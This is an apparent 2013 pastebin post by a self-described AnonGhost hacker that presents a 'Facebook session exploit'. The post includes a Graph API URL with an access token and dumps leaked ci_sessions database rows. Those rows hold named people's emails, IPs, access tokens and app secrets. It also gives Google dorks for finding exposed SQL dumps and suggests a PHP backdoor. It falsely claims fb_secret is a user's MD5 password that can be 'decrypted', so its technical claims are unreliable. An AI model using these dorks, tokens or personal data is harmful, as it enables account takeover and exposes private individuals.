Untitled


SUBMITTED BY: Guest

DATE: May 17, 2013, 6:58 p.m.

FORMAT: Text only

SIZE: 17.3 kB

HITS: 915

  1. ###############################################
  2. #Title: Facebook session Exploit Priv8
  3. #Description : Parameters Logins Facebook
  4. #Exploitation: Manually and use your Brain ^_^
  5. #Date: 12/05/2013
  6. #Author: Mauritania Attacker
  7. #Greetz : All AnonGhost Members <3
  8. ###############################################
  9. Hi All Today i'm going to Explain about the new Exploit i found in Facebook , This time it's an advanced Exploit ^_^ i'm going to explain
  10. step by step.
  11. First , Facebook Token is a Code wich from you can access to another account or view Datas given by your friend , or by an admin of a page or an application.
  12. POC : https://graph.facebook.com/303943362983320/accounts/test-users?installed=true&name=test&permissions=read_stream&method=post&access_token=303943362983320|gdHOjhabhCio0zTGiYKDhZcuUo0
  13. So the Token Code is : gdHOjhabhCio0zTGiYKDhZcuUo0
  14. Before the Token Code we have "|" do not forget like you see in the url.
  15. The Id of the Application is : 303943362983320
  16. So here is the results as you can see :
  17. {
  18. "id": "100005941890185",
  19. "email": "test_yqvqkrx_test\u0040tfbnw.net",
  20. "access_token": "CAAEUb1QutZAgBAKZBAZCw0C5iwP6vcrm6ZARLLuVZCyopLmfGC8ReGrN9jBLt8KcDoybAPJ0qZAZCUZBHFyZCU4xsFT4VvjaCbJisW7dflRZBvroVbeFUJg9PMwFgV0tO83LteqJOCiRGLWXnnsiS0BrPZANGFObF5gmI0ZD",
  21. "login_url": "https://www.facebook.com/platform/test_account_login.php?user_id=100005941890185&n=cNdaa9hGgmzmcvi",
  22. "password": "147905033"
  23. }
  24. #We can see the password and the login url but this method is just to get Users of a Facebook Application.
  25. #So now let's get inside the serious things Facebook `ci_sessions` is the Log sent by "login.facebook.com" to another servers that are using
  26. Facebook Plugins or Modules and it has all parameters of the Logins of Accounts used by Most of the Websites and the best thing is that the Hash password is
  27. in MD5 (ascii Text) that mean that it can be decrypted without any problem ^_^ .
  28. #There is Also A second Log called `WRITE` you can try to find another Logs Var , \!/ Hacking is Art of Exploitation \!/
  29. Parameters are :
  30. *fb_apiid
  31. *fb_apikey
  32. *fb_secret (Password of the Account in Hash MD5)
  33. *fb_accesstoken
  34. *fb_uservisitor
  35. *facebook_id
  36. *facebook_name
  37. *facebook_first_name
  38. *facebook_last_name
  39. *facebook_link
  40. *facebook_username
  41. *facebook_hometown (tracer)
  42. *facebook_location (tracer)
  43. #These are the most Important Parameters of a Facebook account and there is all parameters in the Exploit and also i wanted to show you these two importants
  44. Parameters :
  45. *facebook_hometown (tracer)
  46. *facebook_location (tracer
  47. #It shows how can Facebook trace people and where is the locations saved in their Database ,you can even use a php Backdoor Script with that Parameters
  48. and you will receive all Details in your email \!/
  49. #So You can see that Facebook has been totally exploited ^_^ and now i leave you with the Datas so you can be sure that you understand the Exploit.
  50. *Example Of Facebook `ci_sessions` :
  51. Facebook `ci_sessions` "id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen Peredo D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente Propietario\";}s:11:\"description\";s:27:\"Systems development Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph nicolas maldonado\";}s:4:\"type\";s:11:\"High School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro Boliviano Americano CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}');
  52. *Example of Facebook `WRITE` session :
  53. (6,'fbsecret','823215e0b822191b1451b7f48f877dd5'),
  54. (5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'),
  55. (7,'pageid','188846611127079'),
  56. (8,'pagename','St Maria Goretti Church'),
  57. (9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'),
  58. (10,'Cancellations','2'),
  59. (11,'Bulletins','3'),
  60. (12,'Cancellations/Delays','4'),
  61. (13,'Church Blog','')
  62. #Dorks that you can use or create your own Dorks ^_^
  63. Dork1: ext:sql "fb_secret\"
  64. Dork2: ext:sql "fb_username\"
  65. Dork3: ext:sql "fb_id\"
  66. Dork4: ext:sql "fb_secret\" ci_sessions
  67. Dork5 : ext:sql "fb_secret\" WRITE
  68. #Demo :
  69. *User Facebook : facebook_username\";s:10:\"owenperedo ================>>> Username Facebook : www.facebook.com/owenperedo
  70. *Pass Facebook : \"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\ ================>>> Password Facebook : 49c853d3d0718fd0419fd58ac183bbce (MD5)
  71. #Note that almost of CMS like "Wordpress" , "Joomla" , "Drupal" , etc.. and another Websites has this Bug you can find the Datas in any extensions :
  72. "sql" , "xml" , "dat" , "txt"
  73. Last Exploit Found in Twitter : http://www.hackerzadda.com/2013/05/twitter-exploit-priv8-2013.html
  74. Enj0y Fucking Facebook Accounts ^_^
  75. Mauritania Attacker Was here ^_^
  76. \!/

comments powered by Disqus